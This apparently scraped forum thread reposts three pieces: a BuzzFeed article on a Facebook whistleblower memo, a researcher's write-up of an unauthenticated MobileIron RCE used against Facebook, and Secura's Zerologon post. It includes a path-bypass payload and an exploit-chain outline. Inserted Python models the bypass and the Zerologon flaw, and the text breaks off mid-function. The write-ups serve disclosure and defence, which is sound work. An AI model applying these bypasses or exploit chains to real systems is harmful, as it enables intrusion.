“I Have Blood on My Hands”: A Whistleblower Says Facebook Ignored Global Political Manipulation

A 6,600-word internal memo from a fired Facebook data scientist details how the social network knew leaders of countries around the world were using their site to manipulate voters — and failed to act.

Craig Silverman, Ryan Mac and Pranav Dixit, BuzzFeed News Reporters
Posted on September 14, 2020, at 3:36 p.m. ET

Facebook ignored or was slow to act on evidence that fake accounts on its platform have been undermining elections and political affairs around the world, according to an explosive memo sent by a recently fired Facebook employee and obtained by BuzzFeed News.

The 6,600-word memo, written by former Facebook data scientist Sophie Zhang, is filled with concrete examples of heads of government and political parties in Azerbaijan and Honduras using fake accounts or misrepresenting themselves to sway public opinion. In countries including India, Ukraine, Spain, Brazil, Bolivia, and Ecuador, she found evidence of coordinated campaigns of varying sizes to boost or hinder political candidates or outcomes, though she did not always conclude who was behind them.

“In the three years I’ve spent at Facebook, I’ve found multiple blatant attempts by foreign national governments to abuse our platform on vast scales to mislead their own citizenry, and caused international news on multiple occasions,” wrote Zhang, who declined to talk to BuzzFeed News.
Her LinkedIn profile said she “worked as the data scientist for the Facebook Site Integrity fake engagement team” and dealt with “bots influencing elections and the like.”

[Photo: Kenzo Tribouillard / Getty Images. Facebook CEO Mark Zuckerberg in Brussels, Feb. 17, 2020.]

“I have personally made decisions that affected national presidents without oversight, and taken action to enforce against so many prominent politicians globally that I’ve lost count,” she wrote.

The memo is a damning account of Facebook’s failures. It’s the story of Facebook abdicating responsibility for malign activities on its platform that could affect the political fate of nations outside the United States or Western Europe. It's also the story of a junior employee wielding extraordinary moderation powers that affected millions of people without any real institutional support, and the personal torment that followed.

“I know that I have blood on my hands by now,” Zhang wrote.

These are some of the biggest revelations in Zhang’s memo:
- It took Facebook’s leaders nine months to act on a coordinated campaign “that used thousands of inauthentic assets to boost President Juan Orlando Hernandez of Honduras on a massive scale to mislead the Honduran people.” Two weeks after Facebook took action against the perpetrators in July, they returned, leading to a game of “whack-a-mole” between Zhang and the operatives behind the fake accounts, which are still active.
- In Azerbaijan, Zhang discovered the ruling political party “utilized thousands of inauthentic assets... to harass the opposition en masse.” Facebook began looking into the issue a year after Zhang reported it. The investigation is ongoing.
- Zhang and her colleagues removed “10.5 million fake reactions and fans from high-profile politicians in Brazil and the US in the 2018 elections.”
- In February 2019, a NATO researcher informed Facebook that "he’d obtained Russian inauthentic activity on a high-profile U.S. political figure that we didn’t catch." Zhang removed the activity, “dousing the immediate fire,” she wrote.
- In Ukraine, Zhang “found inauthentic scripted activity” supporting both former prime minister Yulia Tymoshenko, a pro–European Union politician and former presidential candidate, as well as Volodymyr Groysman, a former prime minister and ally of former president Petro Poroshenko. “Volodymyr Zelensky and his faction was the only major group not affected,” Zhang said of the current Ukrainian prime minister.
- Zhang discovered inauthentic activity — a Facebook term for engagement from bot accounts and coordinated manual accounts — in Bolivia and Ecuador but chose “not to prioritize it,” due to her workload. The amount of power she had as a mid-level employee to make decisions about a country’s political outcomes took a toll on her health.
- After becoming aware of coordinated manipulation on the Spanish Health Ministry’s Facebook page during the COVID-19 pandemic, Zhang helped find and remove 672,000 fake accounts “acting on similar targets globally” including in the US.
- In India, she worked to remove “a politically-sophisticated network of more than a thousand actors working to influence" the local elections taking place in Delhi in February. Facebook never publicly disclosed this network or that it had taken it down.

“We’ve built specialized teams, working with leading experts, to stop bad actors from abusing our systems, resulting in the removal of more than 100 networks for coordinated inauthentic behavior," Facebook spokesperson Liz Bourgeois said in a statement. "It’s highly involved work that these teams do as their full-time remit. Working against coordinated inauthentic behavior is our priority, but we’re also addressing the problems of spam and fake engagement. We investigate each issue carefully, including those that Ms. Zhang raises, before we take action or go out and make claims publicly as a company."
BuzzFeed News is not publishing Zhang’s full memo because it contains personal information. This story includes full excerpts when possible to provide appropriate context. In her post, Zhang said she did not want it to go public for fear of disrupting Facebook’s efforts to prevent problems around the upcoming 2020 US presidential election, and due to concerns about her own safety. BuzzFeed News is publishing parts of her memo that are clearly in the public interest. “I consider myself to have been put in an impossible spot – caught between my loyalties to the company and my loyalties to the world as a whole,” she said. “The last thing I want to do is distract from our efforts for the upcoming U.S. elections, yet I know this post will likely do so internally.” Zhang said she turned down a $64,000 severance package from the company to avoid signing a nondisparagement agreement. Doing so allowed her to speak out internally, and she used that freedom to reckon with the power that she had to police political speech. “There was so much violating behavior worldwide that it was left to my personal assessment of which cases to further investigate, to file tasks, and escalate for prioritization afterwards,” she wrote. That power contrasted with what she said seemed to be a lack of desire from senior leadership to protect democratic processes in smaller countries. Facebook, Zhang said, prioritized regions including the US and Western Europe, and often only acted when she repeatedly pressed the issue publicly in comments on Workplace, the company’s internal, employee-only message board. "Most of the world outside the West was effectively the Wild West with myself as the part-time dictator." “With no oversight whatsoever, I was left in a situation where I was trusted with immense influence in my spare time,” she wrote. 
“A manager on Strategic Response mused to myself that most of the world outside the West was effectively the Wild West with myself as the part-time dictator – he meant the statement as a compliment, but it illustrated the immense pressures upon me.” A former Facebook engineer who knew her told BuzzFeed News that Zhang was skilled at discovering fake account networks on the platform. “She's the only person in this entire field at Facebook that I ever trusted to be earnest about this work," said the engineer, who had seen a copy of Zhang’s post and asked not to be named because they no longer work at the company. “A lot of what I learned from that post was shocking even to me as someone who's often been disappointed at how the company treats its best people," they said. Zhang’s memo said the lack of institutional support and heavy stakes left her unable to sleep. She often felt responsible when civil unrest took hold in places she didn’t prioritize for investigation and action. “I have made countless decisions in this vein – from Iraq to Indonesia, from Italy to El Salvador,” she wrote. “Individually, the impact was likely small in each case, but the world is a vast place.” Still, she did not believe that the failures she observed during her two and a half years at the company were the result of bad intent by Facebook’s employees or leadership. It was a lack of resources, Zhang wrote, and the company’s tendency to focus on global activity that posed public relations risks, as opposed to electoral or civic harm. “Facebook projects an image of strength and competence to the outside world that can lend itself to such theories, but the reality is that many of our actions are slapdash and haphazard accidents,” she wrote. 
“We simply didn’t care enough to stop them”

Zhang wrote that she was just six months into the job when she found coordinated inauthentic behavior — Facebook’s internal term for the use of multiple fake accounts to boost engagement or spread content — benefiting Honduran President Juan Orlando Hernández.

[Photo: Orlando Sierra / Getty Images. Two children watch a television screen as Honduran President Juan Orlando Hernández speaks on June 16, 2020.]

The connection to the Honduran leader was made, Zhang said, because an administrator for the president’s Facebook page had been “happily running hundreds of these fake assets without any obfuscation whatsoever in a show of extreme chutzpah.”

The data scientist said she reported the operation, which involved thousands of fake accounts, to Facebook’s threat intelligence and policy review teams, both of which took months to act.

“Local policy teams confirmed that President JOH’s marketing team had openly admitted to organizing the activity on his behalf,” she wrote. “Yet despite the blatantly violating nature of this activity, it took me almost a year to take down his operation.”

That takedown was announced by Facebook in July 2019, but proved futile. Soon, the operation was back up and running, a fact Facebook has never disclosed.

“They had returned within two weeks of our takedown and were back in a similar volume of users,” Zhang wrote, adding that she did a final sweep for the fake accounts on her last day at Facebook. “A year after our takedown, the activity is still live and well.”

In Azerbaijan, she found a large network of inauthentic accounts used to attack opponents of President Ilham Aliyev of Azerbaijan and his ruling New Azerbaijan Party, which uses the acronym YAP. Facebook still has not disclosed the influence campaign, according to Zhang.
The operation detailed in the memo is reminiscent of those of Russia’s Internet Research Agency, a private troll farm that tried to influence the 2016 US elections, because it involved “dedicated employees who worked 9-6 Monday-Friday work weeks to create millions of comments” targeting members of the opposition and media reports seen as negative to Aliyev.

“Perhaps they thought they were clever; the truth was, we simply didn’t care enough to stop them.”

“Multiple official accounts for district-level divisions of the ruling YAP political party directly controlled numerous of these fake assets without any obfuscation whatsoever in another display of arrogance,” she wrote. “Perhaps they thought they were clever; the truth was, we simply didn’t care enough to stop them.”

Katy Pearce, an associate professor at the University of Washington who studies social media and communication technology in Azerbaijan, told BuzzFeed News that fake Facebook accounts have been used to undermine the opposition and independent media in the country for years.

“One of the big tools of authoritarian regimes is to humiliate the opposition in the mind of the public so that they're not viewed as a credible or legitimate alternative,” she told BuzzFeed News. “There's a chilling effect. Why would I post something if I know that I'm going to deal with thousands or hundreds of these comments, that I'm going to be targeted?”

Pearce said Zhang’s comment in the memo that Facebook “didn’t care enough to stop” the fake accounts and trolling aligns with her experience. “They have bigger fish to fry,” she said.

A person who managed social media accounts for news organizations in Azerbaijan told BuzzFeed News that their pages were inundated with inauthentic Facebook comments. “We used to delete and ban them because we didn’t want people who came to our page to be discouraged and not react or comment,” said the person, who asked not to be named because they were not authorized to speak for their employer.
“But since [the trolls] are employees, it’s easy for them to open new accounts.”

They said Facebook has at times made things worse by removing the accounts or pages of human rights activists and other people after trolls report them. “We tried to tell Facebook that this is a real person who does important work,” but it took weeks for the page to be restored.

Zhang wrote that a Facebook investigation into fake accounts and trolling in Azerbaijan is now underway, more than a year after she first reported the issue. On the day of her departure, she called it her “greatest unfinished business” to stop the fake behavior in the country.

“Many others would think nothing of myself devoting this attention to the United States, but are shocked to see myself fighting for these small countries,” she wrote. “To put it simply, my methodologies were systematic globally, and I fought for Honduras and Azerbaijan because that was where I saw the most ongoing harm.”

“I have blood on my hands”

In other examples, Zhang revealed new information about a large-scale fake account network used to amplify and manipulate information about COVID-19, as well as a political influence operation that used fake accounts to influence 2018 elections in the US and Brazil. Some of these details were not previously disclosed by Facebook, suggesting the company’s regular takedown announcements remain selective and incomplete.

Zhang said Facebook removed 672,000 “low-quality fake accounts” after press reports in April that some of the accounts had been engaging with COVID-19 content on the Spanish Health Ministry’s page. She said accounts in that network also engaged with content on US pages. Facebook did not disclose how many accounts it removed, or that those accounts engaged with content in other countries, including the US.

Zhang also shared new details about the scale of inauthentic activity during the 2018 midterm elections in the US, and from Brazilian politicians that same year.
“We ended up removing 10.5 million fake reactions and fans from high-profile politicians in Brazil and the U.S. in the 2018 elections – major politicians of all persuasions in Brazil, and a number of lower-level politicians in the United States,” she wrote.

A September 2018 briefing about Facebook’s election work in the US and Brazil disclosed that it had acted against a network in Brazil that used “fake accounts to sow division and share disinformation,” as well as a set of groups, pages, and accounts that were “falsely amplifying engagement for financial gain.” It did not fully mention Zhang's findings.

The scale of this activity — 672,000 fake accounts in one network, 10.5 million fake engagement and fans in others — indicates active fake accounts are a global problem, and are used to manipulate elections and public debate around the world.

As one of the few people looking for and identifying fake accounts impacting civic activity outside of “priority” regions, Zhang struggled with the power she had been handed.

“We focus upon harm and priority regions like the United States and Western Europe,” Zhang wrote, adding that “it became impossible to read the news and monitor world events without feeling the weight of my own responsibility.”

In Bolivia, Zhang said she found “inauthentic activity supporting the opposition presidential candidate in 2019” and chose not to prioritize it. Months later, Bolivian politics fell into turmoil, leading to the resignation of President Evo Morales and “mass protests leading to dozens of deaths.”

[Photo: Juan Mabromata / Getty Images. Members of leftist parties and Bolivian citizens watch as people burn an effigy of US President Donald Trump during a demonstration in support of Bolivia's overthrown president Evo Morales in front of the US embassy in Buenos Aires on November 22, 2019.]
The same happened in Ecuador, according to Zhang, who “found inauthentic activity supporting the ruling government… and made the decision not to prioritize it.”

The former Facebook employee then wondered how her decision led to downstream effects on how Ecuador’s government handled the COVID-19 pandemic — which has devastated the country — and if that would have been different if she'd acted.

“I have made countless decisions in this vein – from Iraq to Indonesia, from Italy to El Salvador. Individually, the impact was likely small in each case, but the world is a vast place. Although I made the best decision I could based on the knowledge available at the time, ultimately I was the one who made the decision not to push more or prioritize further in each case, and I know that I have blood on my hands by now.”

Zhang also uncovered issues in India, Facebook’s largest market, in the lead up to the local Delhi elections in February 2020. “I worked through sickness to take down a politically-sophisticated network of more than a thousand actors working to influence the election,” she wrote.

Last month, Facebook’s Indian operation came under scrutiny after reports in the Wall Street Journal revealed a top policy executive in the country had stopped local staffers from applying the company’s hate speech policies to ruling party politicians who posted anti-Muslim hate speech.
“Haphazard Accidents”

In her “spare time” in 2019, Zhang took on tasks usually reserved for product managers and investigators, searching out countries including Ukraine, Turkey, India, Indonesia, the Philippines, Australia, the United Kingdom, Taiwan, “and many many more.”

Zhang said she found and took down “inauthentic scripted activity” in Ukraine that supported Yulia Tymoshenko, a complicated political figure who has been involved in controversial gas deals with Russia but taken a more pro-Western tack in her later career, as well as for former prime minister Volodymyr Groysman, an ally of former president Petro Poroshenko. “Volodymyr Zelensky and his faction was the only major group not affected,” she wrote.

In another part of her memo, Zhang said she wanted to push back on the idea that Facebook was run by malicious people hoping to achieve a particular outcome. That was not the case, she wrote, attributing actions to “slapdash and haphazard accidents.”

“Last year when we blocked users from naming the Ukraine whistleblower, we forgot to cover hashtags until I stepped in,” she wrote.

But she also remarked on Facebook’s habit of prioritizing public relations over real-world problems. “It’s an open secret within the civic integrity space that Facebook’s short-term decisions are largely motivated by PR and the potential for negative attention,” she wrote, noting that she was told directly at a 2020 summit that anything published in the New York Times or Washington Post would obtain elevated priority.
“It’s why I’ve seen priorities of escalations shoot up when others start threatening to go to the press, and why I was informed by a leader in my organization that my civic work was not impactful under the rationale that if the problems were meaningful they would have attracted attention, became a press fire, and convinced the company to devote more attention to the space.”

Zhang mentioned one example in February 2019, when a NATO strategic communications researcher reached out to Facebook, alerting the company that he'd "obtained" Russian inauthentic activity “on a high-profile U.S. political figure that we didn’t catch.” That researcher said they were planning on briefing Congress the next day.

“I quickly investigated the case, determined what was going on, and removed the activity, dousing the immediate fire,” Zhang wrote. “Perhaps motivated by the experience, the same researcher tried the same experiment within a month or two, waiting half a year afterwards before sending the report to the press and finally causing the PR fire.”

“Human Resources Are Limited”

Beyond specific examples from around the world, Zhang provided insight into the inner workings at Facebook. She criticized her team’s focus on issues related to “99% of activity that’s essentially spam.”

“Overall, the focus of my organization – and most of Facebook – was on large-scale problems, an approach which fixated us on spam,” she said. “The civic aspect was discounted because of its small volume, its disproportionate impact ignored.”

Zhang outlined the political processes within Facebook itself. She said the best way for her to gain attention for her work was not to go through the proper reporting channels, but to post about the issues on Facebook’s internal employee message board to build pressure.
“In the office, I realized that my viewpoints weren’t respected unless I acted like an arrogant asshole.”

“In the office, I realized that my viewpoints weren’t respected unless I acted like an arrogant asshole,” Zhang said.

When she asked the company to do more in terms of finding and stopping malicious activity related to elections and political activity, she said she was told that “human resources are limited.” And when she was ordered to stop focusing on civic work, “I was told that Facebook would no longer have further need for my services if I refused.”

Zhang was fired this month and posted her memo on her last day, even after offering to stay on through the election as an unpaid volunteer. In her goodbye, she encouraged her colleagues to remain at Facebook and to fix the company from within.

“But you don’t – and shouldn’t – need to do it alone,” she wrote. “Find others who share your convictions and values to work on it together. Facebook is too big of a project for any one person to fix.”

Source: https://www.buzzfeednews.com/article/craigsilverman/facebook-ignore-political-manipulation-whistleblower-memo
  22. Yes, this guy is good, he's just a bit of a show-off (I saw him at Black Hat Asia). And it's worth knowing that he discovered many things by doing CTFs (both participating and creating challenges).
  23. How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM

Author: Orange Tsai

This is a cross-post blog from DEVCORE. For the Chinese version, see here.

Hi, it’s a long time since my last article. This new post is about my research this March, which talks about how I found vulnerabilities on a leading Mobile Device Management product and bypassed several limitations to achieve unauthenticated RCE. All the vulnerabilities have been reported to the vendor and got fixed in June. After that, we kept monitoring large corporations to track the overall fixing progress and then found that Facebook didn’t keep up with the patch for more than 2 weeks, so we dropped a shell on Facebook and reported to their Bug Bounty program!

This research is also presented at HITCON 2020. You can check the slides HERE.

As a Red Teamer, we are always looking for new paths to infiltrate the corporate network from outside. Just like our research in Black Hat USA last year, we demonstrated how leading SSL VPNs could be hacked and become your Virtual “Public” Network! SSL VPN is trusted to be secure and considered the only way to your private network. But, what if your trusted appliances are insecure? Based on this scenario, we would like to explore new attack surfaces on enterprise security, and we get interested in MDM, so this is the article for that!

What is MDM?

Mobile Device Management, also known as MDM, is an asset assessment system that makes the employees’ BYOD more manageable for enterprises. It was proposed in 2012 in response to the increasing number of tablets and mobile devices. MDM can guarantee that the devices are running under the corporate policy and in a trusted environment. Enterprise could manage assets, install certificates, deploy applications and even lock/wipe devices remotely to prevent data leakage as well. UEM (Unified Endpoint Management) is a newer term relevant to MDM which has a broader definition for managed devices. Following we use MDM to represent similar products!
Our target MDM, as a centralized system, can manage and control all employees’ devices. It is undoubtedly an ideal asset assessment system for a growing company. Besides, MDM must be reachable publicly to synchronize devices all over the world. A centralized and public-exposing appliance, what could be more appealing to hackers? Therefore, we have seen hackers and APT groups abusing MDM these years! Such as phishing victims to make MDM a C&C server of their mobile devices, or even compromising the corporate exposed MDM server to push malicious Trojans to all devices. You can read the report Malicious MDM: Let’s Hide This App by Cisco Talos team and First seen in the wild - Malware uses Corporate MDM as attack vector by CheckPoint CPR team for more details! From previous cases, we know that MDM is a solid target for hackers, and we would like to do research on it. There are several MDM solutions, even famous companies such as Microsoft, IBM and Apple have their own MDM solution. Which one should we start with? We have listed known MDM solutions and scanned corresponding patterns all over the Internet. We found that the most prevalent MDMs are VMware AirWatch and MobileIron! So, why did we choose MobileIron as our target? According to their official website, more than 20,000 enterprises chose MobileIron as their MDM solution, and most of our customers are using that as well. We also know Facebook has exposed the MobileIron server since 2016. We have analyzed Fortune Global 500 as well, and found more than 15% using and exposing their MobileIron server to the public! Due to above reasons, it became our main target! Where to Start From past vulnerabilities, we learned there aren’t too many researchers diving into MobileIron. Perhaps the attack vector is still unknown. But we suspect the main reason is that the firmware is too hard to obtain. When researching an appliance, turning a pure BlackBox testing into GrayBox, or WhiteBox testing is vital. 
We spent lots of time searching for all kinds of information on the Internet, and ended up with an RPM package. This RPM file is supposed to be the developer’s testing package. The file is just sitting on a listable WebRoot and indexed by Google Search. Anyway, we got a file to research. The released date of the file is in early 2018. It seems a little bit old but still better than nothing! P.S. We have informed MobileIron and the sensitive files has been removed now. Finding Vulnerabilities After a painful time solving the dependency hell, we set the testing package up finally. The component is based on Java and exposed three ports: 443 - the user enrollment interface 8443 - the appliance management interface 9997 - the MobileIron device synchronization protocol (MI Protocol) All opened ports are TLS-encrypted. Apache is in the front of the web part and proxies all connections to backend, a Tomcat with Spring MVC inside. Due to the Spring MVC, it’s hard to find traditional vulnerabilities like SQL Injection or XSS from a single view. Therefore, examining the logic and architecture is our goal this time! Talking about the vulnerability, the root cause is straightforward. Tomcat exposed a Web Service that deserializes user input with Hessian format. However, this doesn’t mean we can do everything! The main effort of this article is to solve that, so please see the exploitation below. Although we know the Web Service deserializes the user input, we can not trigger it. The endpoint is located on both: User enrollment interface - https://mobileiron/mifs/services/ Management interface - https://mobileiron:8443/mics/services/ We can only touch the deserialization through the management interface because the user interface blocks the Web Service access. It’s a critical hit for us because most enterprises won’t expose their management interface to the Internet, and a management-only vulnerability is not useful to us so that we have to try harder. 
Scrutinizing the architecture, we found Apache blocks our access through Rewrite Rules. It looks good, right? RewriteRule ^/mifs/services/(.*)$ https://%{SERVER_NAME}:8443/mifs/services/$1 [R=307,L] RewriteRule ^/mifs/services [F] MobileIron relied on Apache Rewrite Rules to block all the access to Web Service. It’s in the front of a reverse-proxy architecture, and the backend is a Java-based web server. Have you recalled something? Yes, the Breaking Parser Logic! It’s the reverse proxy attack surface I proposed in 2015, and presented at Black Hat USA 2018. This technique leverage the inconsistency between the Apache and Tomcat to bypass the ACL control and reaccess the Web Service. BTW, this excellent technique is also applied to the recently F5 BIG-IP TMUI RCE vulnerability! https://mobileiron/mifs/.;/services/someService Exploiting Vulnerabilities OK, now we have access to the deserialization wherever it’s on enrollment interface or management interface. Let’s go back to exploitations! Moritz Bechler has an awesome research which summarized the Hessian deserialization vulnerability on his whitepaper, Java Unmarshaller Security. From the marshalsec source code, we learn the Hessian deserialization triggers the equals() and hashcode() while reconstructing a HashMap. It could also trigger the toString() through the XString, and the known exploit gadgets so far are: Apache XBean Caucho Resin Spring AOP ROME EqualsBean/ToStringBean In our environment, we could only trigger the Spring AOP gadget chain and get a JNDI Injection. Name Effect x Apache XBean JNDI Injection x Caucho Resin JNDI Injection √ Spring AOP JNDI Injection x ROME EqualsBean RCE Once we have a JNDI Injection, the rest parts of exploitations are easy! We can just leverage Alvaro Muñoz and Oleksandr Mirosh’s work, A Journey From JNDI/LDAP to Remote Code Execution Dream Land, from Black Hat USA 2016 to get the code execution… Is that true? 
Since Alvaro Muñoz and Oleksandr Mirosh introduced this on Black Hat, we could say that this technique helps countless security researchers and brings Java deserialization vulnerability into a new era. However, Java finally mitigated the last JNDI/LDAP puzzle in October 2018. After that, all java version higher than 8u181, 7u191, and 6u201 can no longer get code execution through JNDI remote URL-Class loading. Therefore, if we exploit the Hessian deserialization on the latest MobileIron, we must face this problem! Java changed the default value of com.sun.jndi.ldap.object.trustURLCodebase to False to prevent attackers from downloading remote URL-Class to get code executions. But only this has been prohibited. We can still manipulate the JNDI and redirect the Naming Reference to a local Java Class! The concept is a little bit similar to Return-Oriented Programming, utilizing a local existing Java Class to do further exploitations. You can refer to the article Exploiting JNDI Injections in Java by Michael Stepankin in early 2019 for details. It describes the attack on POST-JNDI exploitations and how to abuse the Tomcat’s BeanFactory to populate the ELProcessor gadget to get code execution. Based on this concept, researcher Welkin also provides another ParseClass gadget on Groovy. As described in his (Chinese) article: 除了 javax.el.ELProcessor,当然也还有很多其他的类符合条件可以作为 beanClass 注入到 BeanFactory 中实现利用。举个例子,如果目标机器 classpath 中有 groovy 的库,则可以结合之前 Orange 师傅发过的 Jenkins 的漏洞实现利用 It seems the Meta Programming exploitation in my previous Jenkins research could be used here as well. It makes the Meta Programming great again The approach is fantastic and looks feasible for us. But both gadgets ELProcessor and ParseClass are unavailable due to our outdated target libraries. Tomcat introduced the ELProcessor since 8.5, but our target is 7. 
As for the Groovy gadget, the target Groovy version is too old (1.5.6 from 2008) to support the Meta Programming, so we still have to find a new gadget by ourselves. We found a new gadget on GroovyShell in the end. If you are interested, you can check the Pull Request I sent to the JNDI-Injection-Bypass project! Attacking Facebook Now we have a perfect RCE by chaining JNDI Injection, Tomcat BeanFactory and GroovyShell. It’s time to hack Facebook! Aforementioned, we knew the Facebook uses MobileIron since 2016. Although the server’s index responses 403 Forbidden now, the Web Service is still accessible! Everything is ready and wait for our exploit! However, several days before our scheduled attack, we realized that there is a critical problem in our exploit. From our last time popping shell on Facebook, we noticed it blocks outbound connections due to security concerns. The outbound connection is vital for JNDI Injection because the idea is to make victims connecting to a malicious server to do further exploitations. But now, we can’t even make an outbound connection, not to mention others. So far, all attack surfaces on JNDI Injection have been closed, we have no choice but to return to Hessian deserialization. But due to the lack of available gadgets, we must discover a new one by ourselves! Before discovering a new gadget, we have to understand the existing gadgets’ root cause properly. After re-reading Moritz Bechler’s paper, a certain word interested me: Cannot restore Groovy’s MethodClosure as readResolve() is called which throws an exception. A question quickly came up in my mind: Why did the author leave this word here? Although it failed with exceptions, there must have been something special so that the author write this down. Our target is running with a very old Groovy, so we are guessing that the readResolve() constrain might not have been applied to the code base yet! We compared the file groovy/runtime/MethodClosure.java between the latest and 1.5.6. 
$ diff 1_5_6/MethodClosure.java 3_0_4/MethodClosure.java > private Object readResolve() { > if (ALLOW_RESOLVE) { > return this; > } > throw new UnsupportedOperationException(); > } Yes, we are right. There is no ALLOW_RESOLVE in Groovy 1.5.6, and we later learned CVE-2015-3253 is just for that. It’s a mitigation for the rising Java deserialization vulnerability in 2015. Since Groovy is an internally used library, developers won’t update it if there is no emergency. The outdated Groovy could also be a good case study to demonstrated how a harmless component can leave you compromised! Of course we got the shell on Facebook in the end. Here is the video: Vulnerability Report and Patch We have done all the research on March and sent the advisory to MobileIron at 4/3. The MobileIron released the patch on 6/15 and addressed three CVEs for that. You can check the official website for details! CVE-2020-15505 - Remote Code Execution CVE-2020-15506 - Authentication Bypass CVE-2020-15507 - Arbitrary File Reading After the patch has been released, we start monitoring the Internet to track the overall fixing progress. Here we check the Last-Modified header on static files so that the result is just for your information. (Unknown stands for the server closed both 443 and 8443 ports) At the same time, we keep our attentions on Facebook as well. With 15 days no-patch confirm, we finally popped a shell and report to their Bug Bounty program at 7/2! Conclusion So far, we have demonstrated a completely unauthenticated RCE on MobileIron. From how we get the firmware, find the vulnerability, and bypass the JNDI mitigation and network limitation. There are other stories, but due to the time, we have just listed topics here for those who are interested: How to take over the employees’ devices from MDM Disassemble the MI Protocol And the CVE-2020-15506, an interesting authentication bypass I hope this article could draw attention to MDM and the importance of enterprise security! 
Thanks for reading. Sursa: https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
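The Apache/Tomcat parser differential behind the `/mifs/.;/services/` bypass, as an added example that is not code from the original post or from MobileIron. It is a deliberately simplified Python model of the two parsers (an assumption, not the servers' real code): Apache resolves `.` and `..` segments but treats `;` as an ordinary path character before mod_rewrite matches the two quoted rules, while Tomcat strips a `;param` suffix from every segment before resolving dot-segments, so a segment `.;` survives Apache's ACL and then collapses to nothing in Tomcat. The candidate paths and the `someService` name are constructed for the demo.

```python
import re

# The two mod_rewrite rules quoted in the post, applied to the path Apache sees.
APACHE_BLOCK_RULES = [
    re.compile(r"^/mifs/services/(.*)$"),  # redirected to :8443 (R=307), i.e. not proxied
    re.compile(r"^/mifs/services"),        # 403 Forbidden [F]
]


def resolve_dot_segments(segments):
    """Resolve '.' and '..' the way RFC 3986 remove_dot_segments does."""
    out = []
    for seg in segments:
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return out


def apache_view(raw_path):
    """Model (assumption, simplified) of the path Apache matches rules against:
    dot-segments are resolved, but ';' is just another character, so '.;' is
    a normal segment and is kept as-is."""
    return "/" + "/".join(resolve_dot_segments(raw_path.split("/")))


def tomcat_view(raw_path):
    """Model (assumption, simplified) of Tomcat's request mapping: every segment
    first loses its ';path-parameter' suffix, then dot-segments are resolved,
    so '.;' becomes '.' and disappears, and '..;' becomes '..'."""
    stripped = [seg.split(";", 1)[0] for seg in raw_path.split("/")]
    return "/" + "/".join(resolve_dot_segments(stripped))


def apache_blocks(raw_path):
    return any(rule.search(apache_view(raw_path)) for rule in APACHE_BLOCK_RULES)


def route(raw_path):
    """('blocked', None) if Apache's ACL stops the request, otherwise
    ('forwarded', <path Tomcat will actually dispatch to>)."""
    if apache_blocks(raw_path):
        return ("blocked", None)
    return ("forwarded", tomcat_view(raw_path))


def find_acl_bypasses(target, candidates):
    """Candidates Apache lets through that Tomcat nevertheless maps onto the blocked target."""
    return [c for c in candidates if route(c) == ("forwarded", target)]


if __name__ == "__main__":
    target = "/mifs/services/someService"
    candidates = [
        target,
        "/mifs/./services/someService",        # Apache resolves '.'  -> still blocked
        "/mifs/x/../services/someService",     # Apache resolves '..' -> still blocked
        "/mifs/.;/services/someService",       # the post's payload
        "/mifs/..;/mifs/services/someService", # same trick with a '..' segment
    ]
    for c in candidates:
        print(f"{c:40} -> {route(c)}")
    print("ACL bypasses:", find_acl_bypasses(target, candidates))
```

The check a defender wants here is the one `route()` makes explicit: compare what the front-end matched against with what the back-end dispatched to, and alarm (or block) whenever the two disagree. Enforcing the ACL in Tomcat itself, on the normalized path, removes the differential entirely.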
  24. [Blog] Zerologon: instantly become domain admin by subverting Netlogon cryptography (CVE-2020-1472)
Blog post, 11 September 2020, by Tom Tervoort, Senior Security Specialist, and Ralph Moonen, Technical Director at Secura

Last month, Microsoft patched a very interesting vulnerability that would allow an attacker with a foothold on your internal network to essentially become Domain Admin with one click. All that is required is for a connection to the Domain Controller to be possible from the attacker's viewpoint.

Secura's security expert Tom Tervoort previously discovered a less severe Netlogon vulnerability last year that allowed workstations to be taken over, but the attacker required a Person-in-the-Middle (PitM) position for that to work. Now, he has discovered this second, much more severe (CVSS score: 10.0) vulnerability in the protocol. By forging an authentication token for specific Netlogon functionality, he was able to call a function to set the computer password of the Domain Controller to a known value. After that, the attacker can use this new password to take control over the domain controller and steal the credentials of a domain admin.

The vulnerability stems from a flaw in a cryptographic authentication scheme used by the Netlogon Remote Protocol, which among other things can be used to update computer passwords. This flaw allows attackers to impersonate any computer, including the domain controller itself, and execute remote procedure calls on its behalf.

Secura urges everybody to install the patch on all their domain controllers as fast as possible. Please refer to Microsoft's advisory. We published a test tool on GitHub, which you can download here: https://github.com/SecuraBV/CVE-2020-1472. It can tell you whether a domain controller is vulnerable or not. If you are interested in the technical details behind this pretty unique vulnerability and how it was discovered, download the whitepaper.

For more information about the CVE, or if you have any questions, contact Secura at info@secura.com. Read more about Zerologon: CVE-2020-1472 in our whitepaper.

Source: https://www.secura.com/blog/zero-logon
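The post above only says that a cryptographic authentication scheme is flawed; the added example below, which is not code from Secura, Microsoft or the original post, models the publicly documented primitive behind it: Netlogon's ComputeNetlogonCredential runs AES in 8-bit cipher feedback mode over the 8-byte challenge with an all-zero IV. Whenever the first byte of E(key, 0^16) happens to be 0 (about 1 session key in 256), a zero challenge yields a zero credential, so an attacker who always sends zeros gets accepted after a few hundred tries without knowing any secret. Everything that is not the CFB8 structure is a stand-in and an assumption: the block function is a SHA-256 keyed PRF instead of AES (CFB only runs the cipher forward, so the property is identical), the session-key derivation is an HMAC, the machine secret is constructed, and the "reject repeated challenge bytes" hardening is an illustrative check, not the vendor patch.

```python
import hashlib
import hmac
import random

BLOCK_SIZE = 16
ZERO_IV = bytes(BLOCK_SIZE)


def block_encrypt(key, block):
    """Stand-in for the AES-128 block function (assumption): a keyed PRF built
    from SHA-256. CFB mode never inverts the cipher, so any PRF shows the same
    structural weakness as AES does here."""
    return hashlib.sha256(key + block).digest()[:BLOCK_SIZE]


def cfb8_encrypt(key, iv, plaintext):
    """8-bit cipher feedback: each plaintext byte is XORed with the first byte of
    E(key, shift_register); the resulting ciphertext byte is shifted into the
    register, so an all-zero register that produces a 0 byte stays all-zero."""
    register = bytearray(iv)
    out = bytearray()
    for p in plaintext:
        keystream_byte = block_encrypt(key, bytes(register))[0]
        c = p ^ keystream_byte
        out.append(c)
        register = register[1:] + bytes([c])
    return bytes(out)


def cfb8_decrypt(key, iv, ciphertext):
    register = bytearray(iv)
    out = bytearray()
    for c in ciphertext:
        keystream_byte = block_encrypt(key, bytes(register))[0]
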